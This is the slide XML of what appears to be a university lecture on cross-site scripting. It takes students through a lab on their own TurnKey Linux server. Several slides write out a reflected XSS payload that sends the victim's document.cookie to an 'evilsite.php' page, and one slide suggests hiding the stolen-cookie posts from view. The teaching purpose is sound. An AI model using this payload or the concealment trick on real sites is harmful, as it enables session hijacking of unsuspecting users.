                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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060034" y="2689779"/>
            <a:ext cx="4668889" cy="2108530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>But if we do it that way the plus sign will get removed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ is a special character when it’s passed on the URL line.  Again, there are a lot of solutions but and easy one is to simply make multiple calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The text in each one will appear right after the other!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20968816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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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1097280" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>So, your link needs to have to start like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>referrer=Fish market&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(‘&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">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altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</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String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(34);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</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evilsite.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?comment=‘);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</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String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(34);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(‘&gt;’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Try to finish it on your own.  When you think you have it. Alter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and see if it works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The next slide has the answer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285608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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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615222" y="2200799"/>
            <a:ext cx="11022515" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Replace the link in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</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caribou_computers.php?referrer</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Evilsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</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document.write</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String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(34));</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</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evilsite.php?comment</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document.write</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document.cookie</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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>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String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(34));</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('&gt;');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('Click here to go back&lt;/a&gt;');&lt;/script&gt;"&gt;Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Carabou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Computers&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Try to understand what each part is doing here. You may need this for other assignments in the course.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3831869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altLang="zh-CN" dirty="0"/>
              <a:t>Further work!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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1097280" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>As far as hacks go, this isn’t very good.  Even if people don’t know what a session key is.  They are going to be suspicious when they see these funny messages in the guestbook of a site they just visited. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>One thing that you could do is alter the malicious link to include a keyword like “$hidden$” to the comment every time someone posts one using our phony “Logout” link.  Then change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>code to not display any posts that contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>that string!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41316156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EA2EB-CF12-47E0-9BF4-CC04045BBDD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643466" y="786383"/>
            <a:ext cx="3517567" cy="2093975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A7:2017-Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EAB567-DD21-4A73-9AD9-BB3328DD328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642382" y="1315157"/>
            <a:ext cx="5561547" cy="4290041"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91233BE5-7996-47BB-85CC-DA7FED9F4563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643465" y="3043050"/>
            <a:ext cx="3517567" cy="3064505"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="500979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EA2EB-CF12-47E0-9BF4-CC04045BBDD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643466" y="786383"/>
            <a:ext cx="3517567" cy="2093975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A7:2017-Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EAB567-DD21-4A73-9AD9-BB3328DD328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5674732" y="1357256"/>
            <a:ext cx="5496846" cy="4205842"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91233BE5-7996-47BB-85CC-DA7FED9F4563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643465" y="3043050"/>
            <a:ext cx="3517567" cy="3064505"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1549958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Getting started</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1097280" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To follow along download the zip file marked “Files for lecture 10” and extract its contents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two php scripts:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> upload both of them to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>TurnKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux server in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/var/www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> directory!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
